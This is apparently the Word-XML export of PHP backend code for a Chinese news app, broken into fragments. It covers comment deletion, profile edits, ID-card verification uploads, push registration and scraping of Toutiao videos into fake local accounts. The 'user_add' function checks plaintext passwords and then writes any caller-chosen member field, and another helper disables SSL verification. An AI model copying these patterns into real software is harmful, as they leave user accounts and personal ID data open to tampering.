    <w:p w14:paraId="6A56D1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ata'][$k]['huifu'] = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2B2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B77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D8FE6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853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del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671B5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51E6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 ? input('id/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580CAC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793B24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CF4E9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评论</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0AB42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BFC44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DE7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7A4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD58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this-&gt;memberId])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D033E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60772D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delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5728F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5A15EC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161ED6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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C6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F6DD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A9C7A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01EE0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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA162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79550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7DF2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DA8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7D08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ing_xia_del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBF7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D3E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 ? input('id/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609161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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AED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9943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追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AD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13697D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F11F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D4499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article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD39C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uid' =&gt; $this-&gt;memberId])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028D4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id', $id])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964EE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delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015F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7624B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92E99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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE2F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F3A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1396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1D84A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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B450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D8E2B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217C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9C34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9397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_username()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14395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B7D3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 input('param.nickname', '', 'strip_tags') ? input('param.nickname', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054CCE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 = input('param.qianming', '', 'strip_tags') ? input('param.qianming', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9FCD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03897D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:250',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31E4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6F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266AA3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nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A28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ianming' =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B767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05F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6F6DFA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921F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57B11E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40EE89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2671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D82A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gt;where('id', $this-&gt;memberId)-&gt;update(['nickname' =&gt; $nickname, 'qianming' =&gt; $qianming]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC5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4A5C3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EEB5F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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B09E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BD1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0F36A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545AB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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD66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18DC4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EF8E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33C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874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fz()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DEC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8C2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 = input('param.xingming', '', 'strip_tags') ? input('param.xingming', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E7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sfz = input('param.sfz', '', 'strip_tags') ? input('param.sfz', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4B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shou = input('param.sfz_shou', '', 'strip_tags') ? input('param.sfz_shou', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C17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zheng = input('param.img_zheng', '', 'strip_tags') ? input('param.img_zheng', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFD7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A3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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|length:1,10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70080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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>身份证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|length:14,20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EF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shou|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手持身份证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC35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zheng|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>身份证正面</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCF8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9789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a = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FA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ingming' =&gt; $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F87B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 =&gt; $sfz,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E96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shou' =&gt; $sfz_shou,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDDD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fz_zheng' =&gt; $sfz_zheng,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E373F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932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validata)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F424A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D284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validate-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB0C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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907E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853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868E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sfz'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14AB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CFE4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实名认证已通过，无需重复提交</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DAE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194649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874B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57E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sfz'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA436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2B95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正在审核中，无需重复提交</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DFA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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F602E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E53E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0948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xingming'] = $xingming;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7B7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sfz'] = $sfz;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693505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sfz_shou'] = $sfz_shou;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32259E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sfz_zheng'] = $sfz_zheng;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68507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hide'] = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71755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time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D865C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his-&gt;member['sfz']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C0F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sfz')-&gt;where(['uid' =&gt; $this-&gt;memberId])-&gt;update($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264829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395FC8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A88E4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提交成功，等待审核！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF1B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9FA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6D4698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485B26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提交失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE74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236CF2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5977C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3F945F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A195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uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79168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sfz')-&gt;insert($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CDA7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b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C970B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9AED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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交成功，等待审核！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C517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33B2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05EEB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047EE6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提交失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13501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01BE2E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0DD4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93CD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4FDC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CFFD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_sfz()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AEF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1FB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sfz')-&gt;where('uid', $this-&gt;memberId)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD4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89A0E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1B1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RegistrationId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7835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9FA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push_id = input('jpush_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C497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jpush_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A298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77742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2D6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jpush')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'jpush_id' =&gt; $jpush_id])-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B55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data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B64E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5DF6AE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9AE7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Db::name('member_jpush')-&gt;insert(['uid' =&gt; $this-&gt;memberId, 'jpush_id' =&gt; $jpush_id, 'time' =&gt; time()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B59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a]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31096B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5DE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user_add()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19772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7592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 input('mobile/d') ? input('mobile/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157879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input('password') ? input('password') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF1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ield = input('field') ? input('field') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895D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ue = input('value') ? input('value') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732C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obile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E205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26F044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手机号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85F9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30C67C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9824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CE1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password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88EB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1B0B1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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FA9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code' =&gt; 201,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D42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31A6A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640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field) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465F2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6137D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字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC89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6FE2FA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F5D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B33E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ue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EEF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370795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字段值不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39024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01,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27578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E4E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2A31F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD7E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where([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9A8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bile' =&gt; $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE58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gt; $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530653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C73B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gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4ED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1C8FE6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579AD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密码错误或用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E21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11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBA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04FF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9BAD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Db::nmae('member')-&gt;setField($field, $value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E53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a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514BE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77D32B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gt; $a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B326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DDD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17EFAA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605989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操作失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F098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501,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29A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A83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1E8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6E0B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6B60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0A4FD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148FF4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71AFCC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Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90F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BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7990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1EB3B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6F992C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JPush\Client as JPush;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62428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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B5F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aiji extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11228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2BCD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get($url,$json=false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C84D5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ContextOptions=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF57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sl"=&gt;array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB9F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gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF90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erify_peer_name"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7490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DADD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366F39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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64088A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json){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C15F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336AE5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FDE2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74D40A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A829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qiniu($url,$type=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B7A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAF4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126676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FD0AB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033D65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jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C65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50C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ire_once APP_PATH . '/../vendor/qiniu/autoload.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649B7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_config')-&gt;where(['type'=&gt;'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521A8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 = $db['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C93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 $db['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65985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uth = new Auth($accessKey, $secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20597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mgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23248E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ucket = $db['2']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7AC7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 = md5($url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33D4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ret, $err) = $bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878BA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err !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A903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094491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269291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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE47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122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AB70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svideo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A033A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tegory=input('category') ? input('category') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D674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toutiao/svideo/category/'.$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064762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7BA8E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19463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暂无小视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FD6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6F04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03FE19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462F3B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itle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08ED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Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A955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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F35A7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5868CF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47E07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9777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463774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788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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258E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image']) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E88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video']) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C75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user'])) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B40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id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F2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46D871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v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789201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145981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age']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1D2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ickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CDD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1B1EB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05B4E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4FE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this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC1A8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mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79308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toutiao']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C4C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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0D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053B62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v['time'] ? $v['time'] : $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52478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time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB1F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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCBB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50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D0A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022837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ource']=$v['user']['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB41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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057263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1051FA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id.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FF4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id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE820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toutiao_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327E5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9EEF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6441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33C9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user($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF39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password']=md5(rand(100000,999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6FE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hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CF6A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6A2FA9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create_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182C2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pdate_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50779F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outiao_uid']=$data['toutiao_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823E7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nickname']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346306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img']=$data['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BD1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qianming']=$data['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81A2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me('member')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D93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31185B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6E60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ublic function toutiao_search(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65E8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4FA74D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request-&gt;param('page') ? $request-&gt;param('page') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60525E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keyword=$request-&gt;param('keyword');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FE4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id=$request-&gt;param('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7B3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eyword){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59674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请输入搜索关键词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FFF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5A5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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1AB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请输入分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC21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9549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ab=$request-&gt;param('tab') ? $request-&gt;param('tab') : 'search_tab';    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544041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page']=$page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FB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keyword']=$keyword;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35787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ab']=$tab;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F3F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toutiao/search?".http_build_query($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A2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w:t>
      </w:r>
    </w:p>
